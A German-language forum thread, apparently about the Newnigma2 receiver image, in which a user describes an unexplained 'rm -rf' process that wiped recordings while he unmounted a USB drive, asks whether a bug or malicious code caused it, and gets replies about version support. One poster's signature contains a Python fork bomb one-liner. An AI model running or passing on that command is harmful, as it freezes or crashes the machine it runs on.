Devicemanager löscht Festplatte

    This site uses cookies. By continuing to browse this site, you are agreeing to our Cookie Policy.

    • Devicemanager löscht Festplatte

      Hallo Gemeinde und speziell an die Macher von Newnigma2

      Newnigma2 3.2 unstable 2011-11-08

      ich weiss, ich bin nicht auf dem neuesten Softwarestand, aber die Version 3.3.2 arbeitet für mich nicht zufriedenstellend (sobald ich dort moviecut benutze reagiert die Box extrem träge und Aufnahmen auf der Festplatte misslingen bzw. haben extreme Aussetzer, wie wenn ich ein grosses File gleichzeitig löschen würde)

      Also, deshalb habe ich diesen (zuletzt gut funktionierenden Softwarestand) im Einsatz.

      Aber was mir heute damit passiert ist spottet jeder Beschreibung und lässt einem die Haare zu Berge stehen.

      Ich wollte eine über front-usb angeschlossene 2TB Fesplatte mit dem Devicemanager unmounten. Nichts, was ich nicht auch schon mal erfolgreich getan hätte. Aber heute erschienen daraufhin nur Zahnräder. Nach einer Weile ohne Veränderung (also immer noch sich drehende Zahnräder) habe ich per telnet die auf der Box laufenden Prozesse überprüft. Dann der Schock: Da lief ein Prozess, welchen ich mit 1000% Garantie nicht angestossen habe. Die Zeile hiess so in etwa sh rm -rf. Da schwante sogar mir als Linux-Laie Böses. Ich habe den Prozess sofort gekillt - doch da waren schon gut 25% der Festplatte gelöscht! Ade täglich aufgenommene Dallas und Bonanza Folgen! Die Arbeit von etwas mehr als 18 Monaten ist unwiderruflich futsch. ;(

      Könnte im Devicemanager ein Fehler verborgen sein, welcher bei ungünstiger Konstellation, solch dramatisches Fehlverhalten an den Tag legt? Oder könnte jemand (die Box hängt am weltweiten Netz, damit ich sie fernverwalten kann) Schad-Code eingeschleust haben?
      Ist schonmal jemandem Anderen dieses Phänomen untergekommen?
      Kann ich den Devicemanager-Code selbst überprüfen, wenn ja wo und wie?
    • Original von sparksofinsanity
      Also der Devicemanager löscht mit Sicherheit nichts und schon gar nicht mit rm -rf


      Könnte der Code durch Schad-Code modifiziert worden sein - war ja auch eine Frage.

      Welcher Teil des Programms ist dafür zuständig und wo liegt er? Ist der Code in einem compilierten Programm zu finden oder offen?

      Danke für jeden Hinweis

      LG Seebueb
    • Original von Seebueb
      Original von sparksofinsanity
      Also der Devicemanager löscht mit Sicherheit nichts und schon gar nicht mit rm -rf


      Könnte der Code durch Schad-Code modifiziert worden sein - war ja auch eine Frage.

      Welcher Teil des Programms ist dafür zuständig und wo liegt er? Ist der Code in einem compilierten Programm zu finden oder offen?

      Danke für jeden Hinweis

      LG Seebueb


      Hätte vielleicht einer der DEV's die Güte sich meiner Frage anzunehmen - ich würde nicht gerne noch einmal Dateien auf der Festplatte verlieren.

      @EverythingZen
      Danke für Deinen Hinweis. In erster Linie geht es mir nicht um die Daten-Wiederherstellung. Der Verlust ist zwar ärgerlich, aber damit könnte ich leben. Andere Leute verlieren ihr ganzes Hab und Gut, wenn nicht sogar ihr Leben z.B. wegen Naturkatastrophen.
      Es geht mir nur darum was immer diesen desaströsen rm -rf Prozess gestartet hat als ich das Device unmounten wollte.
      Images
      • devicemanager_unmount.jpg

        132.12 kB, 1,280×720, viewed 1,093 times
    • Tja da wirste pech haben der Devicemanager existiert nicht mehr weil wir nur noch oe 2.0 haben da gibts den nicht mehr.

      Umstellen auf oe 2.0 oder auf nen anderes image aber support für was nicht mehr existierendes nicht möglich.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • Original von kati910
      ............ weil wir nur noch oe 2.0 haben da gibts den nicht mehr.

      .


      Na da bis Du aber ein wenig voreilig, oder? ;)

      Wenn ich mir nur das Banner auf unserer NN-Seite ansehe ist doch wohl immer noch das OE1.6 also 3.3.2 aktuell , und noch ist das auch gut so weil es super funktioniert!

      Gruß, Usko.
    • Hab das Alpha seit dem 1. Tag drauf.
      Je eher man sich damit beschäftigt umso leichter wird es.
      Ausserdem lüppt selbst die Alpha (Experimnetal 2.0) zumindest genaus so gut oder schlecht wie die 1.6er Eperimentals.
      Kleinere Fehler tauchen nun mal überall auf, selbst bei Release Versionen.
      O.T.P.V.D.H

      The post was edited 1 time, last by BumBum69 ().